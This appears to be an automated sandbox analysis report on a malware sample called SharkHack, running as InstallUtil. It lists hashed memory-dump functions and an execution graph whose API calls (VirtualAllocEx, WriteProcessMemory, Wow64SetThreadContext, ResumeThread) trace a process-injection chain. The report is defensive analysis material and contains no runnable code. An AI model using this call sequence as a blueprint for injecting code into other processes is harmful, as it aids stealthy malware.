                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c4c68dd24ee43f42f09b18dad1ecfbe8c9e489003854525871a4a36f48b42952
                                                                                                          • Instruction ID: 8ddaac3686895a614ddccd8afb4540815f8e7e32b9c1f4d7d6365dc9056bce59
                                                                                                          • Opcode Fuzzy Hash: c4c68dd24ee43f42f09b18dad1ecfbe8c9e489003854525871a4a36f48b42952
                                                                                                          • Instruction Fuzzy Hash: A341D5B4E0160ADFCB04DFAAC5805AEFBF2BF88301F25C56AD409B7354D735AA418B95
                                                                                                          Function 089C002F Relevance: .1, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e78ef951a4c6f5d39f1b740f47a7fd5b468f2ccbd5e41368c72f3bdf955bb3ab
                                                                                                          • Instruction ID: 4e0f27824cc01c8ad903f86f348e7d03c8baf9a669a5850cc10f19183e4b2606
                                                                                                          • Opcode Fuzzy Hash: e78ef951a4c6f5d39f1b740f47a7fd5b468f2ccbd5e41368c72f3bdf955bb3ab
                                                                                                          • Instruction Fuzzy Hash: 2321EA71E056588BEB58CFAB9C406DEFAF3AFC8200F18C07AC858A6254DB340645CF55
                                                                                                          Function 089C9430 Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 32bc950052c3f12b2884605224141132f27fb40ca59aa052a5642cec11cd33fd
                                                                                                          • Instruction ID: 377a12c39481630b4cbecf7281889e1becf8c8c416b610f137c11ce80cd605e3
                                                                                                          • Opcode Fuzzy Hash: 32bc950052c3f12b2884605224141132f27fb40ca59aa052a5642cec11cd33fd
                                                                                                          • Instruction Fuzzy Hash: 06113A70E116198FDB09CF6BD8405AEBEF7AFC8301F14C07AD408A7255EA314946CB52
                                                                                                          Function 089C57F8 Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb6f595f8d37a616e45f60f9e774b530cd23a68dc83724657d678a5fa2179d6d
                                                                                                          • Instruction ID: 336d8a158df8e0392c250fde82e04ef76e225542a5b5d17ef047a4b91f31d748
                                                                                                          • Opcode Fuzzy Hash: cb6f595f8d37a616e45f60f9e774b530cd23a68dc83724657d678a5fa2179d6d
                                                                                                          • Instruction Fuzzy Hash: 8A11DD71E056189BEB18CF6BDC4469EFAF3AFC8200F04C07AD818A6254DB7415458F55

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:22.6%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:130
                                                                                                          Total number of Limit Nodes:8
                                                                                                          execution_graph 56344 7f91168 56345 7f912f3 56344->56345 56346 7f9118e 56344->56346 56346->56345 56349 7f913e8 PostMessageW 56346->56349 56351 7f913e0 PostMessageW 56346->56351 56350 7f91454 56349->56350 56350->56346 56352 7f91454 56351->56352 56352->56346 56353 7f90ce8 56354 7f90d26 Wow64SetThreadContext 56353->56354 56356 7f90d75 56354->56356 56357 7f90268 56358 7f902a8 VirtualAllocEx 56357->56358 56360 7f902e5 56358->56360 56383 7f90a48 56384 7f90a90 VirtualProtectEx 56383->56384 56386 7f90ace 56384->56386 56436 7f905a8 56437 7f905f0 WriteProcessMemory 56436->56437 56439 7f90647 56437->56439 56387 8424680 56388 84246b2 56387->56388 56392 842bae0 56388->56392 56396 842baf0 56388->56396 56389 8429e8e 56400 842bc4a 56392->56400 56406 842bc78 56392->56406 56393 842bb0b 56393->56389 56397 842bb0b 56396->56397 56398 842bc4a 2 API calls 56396->56398 56399 842bc78 2 API calls 56396->56399 56397->56389 56398->56397 56399->56397 56401 842bc46 56400->56401 56401->56400 56412 842bfb0 56401->56412 56416 842c325 56401->56416 56424 842bf77 56401->56424 56402 842bf33 56402->56393 56407 842bc7d 56406->56407 56409 842bfb0 DeleteFileW 56407->56409 56410 842bf77 DeleteFileW 56407->56410 56411 842c325 2 API calls 56407->56411 56408 842bf33 56408->56393 56409->56408 56410->56408 56411->56408 56413 842bfb5 56412->56413 56428 842b2b4 56413->56428 56417 842c337 56416->56417 56421 842c2e5 56416->56421 56418 842c343 DeleteFileW 56417->56418 56417->56421 56420 842c447 56418->56420 56420->56402 56422 842b2b4 DeleteFileW 56421->56422 56423 842c315 56422->56423 56423->56402 56425 842bf83 56424->56425 56426 842b2b4 DeleteFileW 56425->56426 56427 842c315 56426->56427 56427->56402 56429 842c3c8 DeleteFileW 56428->56429 56431 842c315 56429->56431 56431->56402 56443 7bad1c8 56444 7bad1dc 56443->56444 56445 7bad255 56444->56445 56454 7b74d52 56444->56454 56459 7b76477 56444->56459 56463 7b754e7 56444->56463 56467 7b74a3b 56444->56467 56471 7b7553c 56444->56471 56475 7b74bed 56444->56475 56479 7b756cd 56444->56479 56483 7b74cf1 56444->56483 56455 7b74d59 56454->56455 56488 7b76992 56455->56488 56491 7b76998 56455->56491 56456 7b74d63 56461 7b76992 VirtualProtect 56459->56461 56462 7b76998 VirtualProtect 56459->56462 56460 7b76488 56461->56460 56462->56460 56465 7b76992 VirtualProtect 56463->56465 56466 7b76998 VirtualProtect 56463->56466 56464 7b754fb 56465->56464 56466->56464 56469 7b76992 VirtualProtect 56467->56469 56470 7b76998 VirtualProtect 56467->56470 56468 7b74a4c 56469->56468 56470->56468 56473 7b76992 VirtualProtect 56471->56473 56474 7b76998 VirtualProtect 56471->56474 56472 7b7557a 56473->56472 56474->56472 56477 7b76992 VirtualProtect 56475->56477 56478 7b76998 VirtualProtect 56475->56478 56476 7b74c11 56477->56476 56478->56476 56481 7b76992 VirtualProtect 56479->56481 56482 7b76998 VirtualProtect 56479->56482 56480 7b756e7 56481->56480 56482->56480 56484 7b74ce6 56483->56484 56484->56483 56486 7b76992 VirtualProtect 56484->56486 56487 7b76998 VirtualProtect 56484->56487 56485 7b74d63 56486->56485 56487->56485 56489 7b769e0 VirtualProtect 56488->56489 56490 7b76a1a 56489->56490 56490->56456 56492 7b769e0 VirtualProtect 56491->56492 56493 7b76a1a 56492->56493 56493->56456 56432 7b7fb70 56433 7b7fbb5 Wow64GetThreadContext 56432->56433 56435 7b7fbfd 56433->56435 56361 7f935e0 56362 7f93608 56361->56362 56363 7f935fe 56361->56363 56366 7f93648 56363->56366 56371 7f93633 56363->56371 56367 7f93675 56366->56367 56368 7f93656 56366->56368 56367->56362 56376 7f927f4 56368->56376 56372 7f93648 56371->56372 56373 7f927f4 CloseHandle 56372->56373 56375 7f93675 56372->56375 56374 7f93671 56373->56374 56374->56362 56375->56362 56377 7f937c0 CloseHandle 56376->56377 56378 7f93671 56377->56378 56378->56362 56379 7f90f50 56380 7f90f90 ResumeThread 56379->56380 56382 7f90fc1 56380->56382 56440 7bae260 56441 7bae2a8 VirtualProtect 56440->56441 56442 7bae2e2 56441->56442 56494 7b79149 56495 7b7918b 56494->56495 56496 7b795b9 56495->56496 56499 7b7b720 56495->56499 56503 7b7bc28 56495->56503 56500 7b7b72e 56499->56500 56501 7b7b735 56499->56501 56500->56495 56501->56500 56507 7b7dfb0 56501->56507 56505 7b7bc4f 56503->56505 56504 7b7be09 56504->56495 56505->56504 56506 7b7dfb0 CreateProcessAsUserW 56505->56506 56506->56505 56508 7b7e02f CreateProcessAsUserW 56507->56508 56510 7b7e130 56508->56510

                                                                                                          Executed Functions

                                                                                                          Function 085E4D2B Relevance: 5.5, Instructions: 5532COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1557 85e4d2b-85e4f79 1586 85e4f7f-85e5cef 1557->1586 1587 85e6f6b-85e71ef 1557->1587 2009 85e5fee-85e6f63 1586->2009 2010 85e5cf5-85e5fe6 1586->2010 1654 85e81ee-85e916d 1587->1654 1655 85e71f5-85e81e6 1587->1655 2225 85e947c-85e948f 1654->2225 2226 85e9173-85e9474 1654->2226 1655->1654 2009->1587 2010->2009 2231 85e9a8f-85ea9f7 2225->2231 2232 85e9495-85e9a87 2225->2232 2226->2225 2625 85ea9f7 call 85ec2f8 2231->2625 2626 85ea9f7 call 85ec308 2231->2626 2627 85ea9f7 call 85ec276 2231->2627 2232->2231 2624 85ea9fd-85eaa04 2625->2624 2626->2624 2627->2624
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5fc64cb449a271c1320aa97397c3cf442cf79a0c462418d74271060ee41a3271
                                                                                                          • Instruction ID: 6a1af994f6a554a7581538d49449a20ed5b0aa783c588eb6575f4ba243a7763e
                                                                                                          • Opcode Fuzzy Hash: 5fc64cb449a271c1320aa97397c3cf442cf79a0c462418d74271060ee41a3271
                                                                                                          • Instruction Fuzzy Hash: CCB30970A01229CBCB58EF38D9856ACBBF2FB89215F4044EDD449A7350DE355E89DF82
                                                                                                          Function 085E4D40 Relevance: 5.5, Instructions: 5524COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2628 85e4d40-85e4f79 2656 85e4f7f-85e5cef 2628->2656 2657 85e6f6b-85e71ef 2628->2657 3079 85e5fee-85e6f63 2656->3079 3080 85e5cf5-85e5fe6 2656->3080 2724 85e81ee-85e916d 2657->2724 2725 85e71f5-85e81e6 2657->2725 3295 85e947c-85e948f 2724->3295 3296 85e9173-85e9474 2724->3296 2725->2724 3079->2657 3080->3079 3301 85e9a8f-85ea9f7 3295->3301 3302 85e9495-85e9a87 3295->3302 3296->3295 3695 85ea9f7 call 85ec2f8 3301->3695 3696 85ea9f7 call 85ec308 3301->3696 3697 85ea9f7 call 85ec276 3301->3697 3302->3301 3694 85ea9fd-85eaa04 3695->3694 3696->3694 3697->3694
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8ac23cbc0e17fb925f4126b36e4cd5b4c5b85218b6b79d8d33f8b12565cc5c6a
                                                                                                          • Instruction ID: c85d6a98de5d14784de53af720c6e5d425d352e4e26ab94682d9d7d17f8171a7
                                                                                                          • Opcode Fuzzy Hash: 8ac23cbc0e17fb925f4126b36e4cd5b4c5b85218b6b79d8d33f8b12565cc5c6a
                                                                                                          • Instruction Fuzzy Hash: 40B30970A01229CBCB58EF38D9856ACBBF2FB89215F4044EDD449A7350DE355E89DF82
                                                                                                          Function 085E09B0 Relevance: 4.8, Strings: 3, Instructions: 1021COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 6095 85e09b0-85e0b76 6116 85e164a-85e165e 6095->6116 6117 85e0b7b-85e0b87 6116->6117 6118 85e1664 6116->6118 6120 85e0b8d-85e0bf8 6117->6120 6121 85e1682-85e169b 6117->6121 6119 85e1669-85e167c 6118->6119 6296 85e0bfa call 85e1938 6120->6296 6297 85e0bfa call 85e1928 6120->6297 6125 85e169d-85e16e3 6121->6125 6126 85e1680 6121->6126 6125->6119 6130 85e16e5-85e1708 6125->6130 6126->6121 6131 85e172f-85e174c 6130->6131 6132 85e170a-85e172c 6130->6132 6133 85e1751-85e177c call 85ed82b 6131->6133 6132->6131 6138 85e177d-85e1785 6133->6138 6137 85e0bff-85e0c11 6289 85e0c13 call 85e2a48 6137->6289 6290 85e0c13 call 85e2a39 6137->6290 6138->6133 6139 85e1787-85e17b6 6138->6139 6141 85e17f8-85e181c 6139->6141 6142 85e17b8-85e17c5 6139->6142 6142->6138 6143 85e17c7-85e17d2 6142->6143 6143->6141 6144 85e0c18-85e0c3b 6291 85e0c41 call 85e2a48 6144->6291 6292 85e0c41 call 85e2b68 6144->6292 6293 85e0c41 call 85e2be8 6144->6293 6294 85e0c41 call 85e2a39 6144->6294 6295 85e0c41 call 85e2be7 6144->6295 6145 85e0c47-85e0dd8 6167 85e0dde-85e0ea8 6145->6167 6168 85e167d 6145->6168 6167->6168 6179 85e0eae-85e0f5f 6167->6179 6168->6126 6179->6168 6189 85e0f65-85e1059 6179->6189 6202 85e147c-85e1490 6189->6202 6203 85e105e-85e106a 6202->6203 6204 85e1496-85e1574 6202->6204 6203->6121 6205 85e1070-85e1259 6203->6205 6228 85e157a-85e1648 6204->6228 6205->6168 6256 85e125f-85e1476 6205->6256 6228->6116 6228->6168 6256->6168 6256->6202 6289->6144 6290->6144 6291->6145 6292->6145 6293->6145 6294->6145 6295->6145 6296->6137 6297->6137
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: G$Te^q$Te^q
                                                                                                          • API String ID: 0-3949708683
                                                                                                          • Opcode ID: fe22534b85d07783b358e02681b930268fa973fb3c2e99368533e3fb078bacea
                                                                                                          • Instruction ID: 8024ed0c5140778d360f87c7e9ee5c780c39f701a6f08097b43a003839f14fd3
                                                                                                          • Opcode Fuzzy Hash: fe22534b85d07783b358e02681b930268fa973fb3c2e99368533e3fb078bacea
                                                                                                          • Instruction Fuzzy Hash: C182FF30A04255CFDB05AF79CC94A5DBFB1FF89604F4585E9D088DB392DA389C4ACB52
                                                                                                          Function 031DA090 Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$$^q$$^q
                                                                                                          • API String ID: 0-1611274095
                                                                                                          • Opcode ID: 013537bb1f85b37bca95ecc88578e24990bc7e6e84ceeb03cc7f6fac6108bf94
                                                                                                          • Instruction ID: 890eed944ad5c265eb79e09e546291365eb2d2baf55414bc020450431bde48ae
                                                                                                          • Opcode Fuzzy Hash: 013537bb1f85b37bca95ecc88578e24990bc7e6e84ceeb03cc7f6fac6108bf94
                                                                                                          • Instruction Fuzzy Hash: 37519C307442158FCB19EB7A986853E7BEBAFCEA403198469E407CF3A5DF25CC068795
                                                                                                          Function 031DA6B3 Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Ycq$Ycq$Ycq
                                                                                                          • API String ID: 0-1440525778
                                                                                                          • Opcode ID: 09a8e2c4fdaa92915313a9b9be9adcac87a1b2d0af8570578f9b9c896dee6b4a
                                                                                                          • Instruction ID: 197b690ce2e5a11853df34945a345d25ef21615ccda029c909ea8ab5bcb727d9
                                                                                                          • Opcode Fuzzy Hash: 09a8e2c4fdaa92915313a9b9be9adcac87a1b2d0af8570578f9b9c896dee6b4a
                                                                                                          • Instruction Fuzzy Hash: 6C51A030E04204CFCB18DAADC4547ADB7B6BF8E321F25842AD916A7385DB35DC82CB90
                                                                                                          Function 031D8348 Relevance: 3.0, Strings: 2, Instructions: 534COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (o^q$4'^q
                                                                                                          • API String ID: 0-273632683
                                                                                                          • Opcode ID: be6a6187b8f7676b99582be0d178e56476f7bf450a2c12a650c99c3f2fb48ca4
                                                                                                          • Instruction ID: f13e6486c225ba4c6b7ccf086aaca7e22ec9b99a1f857d40b19333e12160aa6d
                                                                                                          • Opcode Fuzzy Hash: be6a6187b8f7676b99582be0d178e56476f7bf450a2c12a650c99c3f2fb48ca4
                                                                                                          • Instruction Fuzzy Hash: 00225D71A00209DFCB15DF68C984AAEBBF6FF8D314F198595E4069B2A1C731ED81CB61
                                                                                                          Function 031D6450 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$Hbq
                                                                                                          • API String ID: 0-4258043069
                                                                                                          • Opcode ID: 31871dd7e7312c10699e08db1dd1ecdf64af33319c250af7c372bd59c263573a
                                                                                                          • Instruction ID: 73e6d5817c50c1e7139bd3473e4f8faf673ab80c17cf9997d93270f12e7ee533
                                                                                                          • Opcode Fuzzy Hash: 31871dd7e7312c10699e08db1dd1ecdf64af33319c250af7c372bd59c263573a
                                                                                                          • Instruction Fuzzy Hash: 06E19B307002159FCB19DF28D858B6EBBAABB8E750F588469E506CB394DF34DC46CB91
                                                                                                          Function 085E1C48 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: nKvq$nKvq
                                                                                                          • API String ID: 0-2223595353
                                                                                                          • Opcode ID: f4ff18daaf66d7c46281ef1deeffe0aa7e6519db4b8d708883ab23926a0718bc
                                                                                                          • Instruction ID: 0bb19bb03f52c13120cacccd4c912934f9f3b909601c7fada75bc0922ec8d234
                                                                                                          • Opcode Fuzzy Hash: f4ff18daaf66d7c46281ef1deeffe0aa7e6519db4b8d708883ab23926a0718bc
                                                                                                          • Instruction Fuzzy Hash: 80B11075E00606CFCB18DF68C49095EFBB2BF88321B158655E955AB356DB30EC86CBD0
                                                                                                          Function 085E1C38 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: nKvq$nKvq
                                                                                                          • API String ID: 0-2223595353
                                                                                                          • Opcode ID: 593972b98716d06c93ceb24c35895ce59372b5e058dfc39f31043268c1fe297a
                                                                                                          • Instruction ID: 59810c8dc2c8b41ab40a8fcd8bf59226301cc4c068d6b586d6ef2222714698f6
                                                                                                          • Opcode Fuzzy Hash: 593972b98716d06c93ceb24c35895ce59372b5e058dfc39f31043268c1fe297a
                                                                                                          • Instruction Fuzzy Hash: 06B11B35E006068FCB08DF58C8909AEF7B6BF88311B158655E955AB35ADB30FC86CBD0
                                                                                                          Function 031D6B40 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,bq$,bq
                                                                                                          • API String ID: 0-2699258169
                                                                                                          • Opcode ID: 63a9fd656e4b0638ca5eb16045e02df7095b2b48f2b9eaa4bc58bad20c33c2a8
                                                                                                          • Instruction ID: d127758850ec25f46a814ca4c0df536ae1b8d816b36834af117a38de92121010
                                                                                                          • Opcode Fuzzy Hash: 63a9fd656e4b0638ca5eb16045e02df7095b2b48f2b9eaa4bc58bad20c33c2a8
                                                                                                          • Instruction Fuzzy Hash: 93819174B009058FCB18DF6DD8849AAB7B6FF8E310B998169D406EB369DB31EC41CB51
                                                                                                          Function 085E3B7B Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: bafd2d8801c4e25df3d133c5c7554ba346a0f511d77bed9e6837986fa8c4b345
                                                                                                          • Instruction ID: 9ee951f5f1d302cf8fcb89612da88bb5005ad3f1c731d152145f4da2693efd43
                                                                                                          • Opcode Fuzzy Hash: bafd2d8801c4e25df3d133c5c7554ba346a0f511d77bed9e6837986fa8c4b345
                                                                                                          • Instruction Fuzzy Hash: F61100753442515FC7066B7CEC5496D3BEABFCA610B15009BE546CF3A2CE64CC0787A6
                                                                                                          Function 085E3BA8 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: 5f75f245895b543c4f408d86b954cdee51150a772c61176f7c6ef1f27c08a7be
                                                                                                          • Instruction ID: ea2fbac89d5ca510158164a782545eb3f9da8ab19b562645e2f95add84ab9088
                                                                                                          • Opcode Fuzzy Hash: 5f75f245895b543c4f408d86b954cdee51150a772c61176f7c6ef1f27c08a7be
                                                                                                          • Instruction Fuzzy Hash: 4DF0F6353401111FC608B77DE55893E76DBAFCDA24714405AE50ACF3A4CE64DC034796
                                                                                                          Function 085E3268 Relevance: 1.8, Strings: 1, Instructions: 532COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 69716d141aeadb8469d1dc709ba920a6925064e10ba632187d68cd9e22d28336
                                                                                                          • Instruction ID: 900442090156f7dbc6e739310c90d5a69c992a82599340081f38c5d0b14793b0
                                                                                                          • Opcode Fuzzy Hash: 69716d141aeadb8469d1dc709ba920a6925064e10ba632187d68cd9e22d28336
                                                                                                          • Instruction Fuzzy Hash: 5F125D70B102158BCB08FFB9D98866DBBF6FB88A08F50496CD489DB355DE349C09DB52
                                                                                                          Function 085E3278 Relevance: 1.8, Strings: 1, Instructions: 527COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: be3d4c64c07b86724733888b32a352a858492d28cc59645f56de3cf1dbde01d3
                                                                                                          • Instruction ID: 17f258ad99590272c47673ccd683e53c419a047c5be03d374ce0a0d123cd687f
                                                                                                          • Opcode Fuzzy Hash: be3d4c64c07b86724733888b32a352a858492d28cc59645f56de3cf1dbde01d3
                                                                                                          • Instruction Fuzzy Hash: 7F025E70B102158BCB08FFB9D98866DBBF6FB88A08F50496CD449EB355DE349C09DB52
                                                                                                          Function 07B7DFB0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07B7E11B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921271295.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7b70000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcessUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2217836671-0
                                                                                                          • Opcode ID: 408faf7a609a40073c9605962d6cb68046d9064f4097fba2ebcf26c350fcbe38
                                                                                                          • Instruction ID: 2597922b1f131298702b9fcea5eb3e2e6f1b36a05b442636674387f119d9093d
                                                                                                          • Opcode Fuzzy Hash: 408faf7a609a40073c9605962d6cb68046d9064f4097fba2ebcf26c350fcbe38
                                                                                                          • Instruction Fuzzy Hash: 3651F7B190026ADFDB24CF99C941BDDBBB5BF48310F0484EAE918B7250DB759A85CF90
                                                                                                          Function 0842C325 Relevance: 1.6, APIs: 1, Instructions: 145fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0842C438
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922177512.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_8420000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 882e46fbbacb506b6661e7e204282263389fa103aa5160dee4412f8ed112797b
                                                                                                          • Instruction ID: 2a23f7c2626a2d2f435ec01d64a9349bfccb5daecbe8aaab2459a48bd9b7bce8
                                                                                                          • Opcode Fuzzy Hash: 882e46fbbacb506b6661e7e204282263389fa103aa5160dee4412f8ed112797b
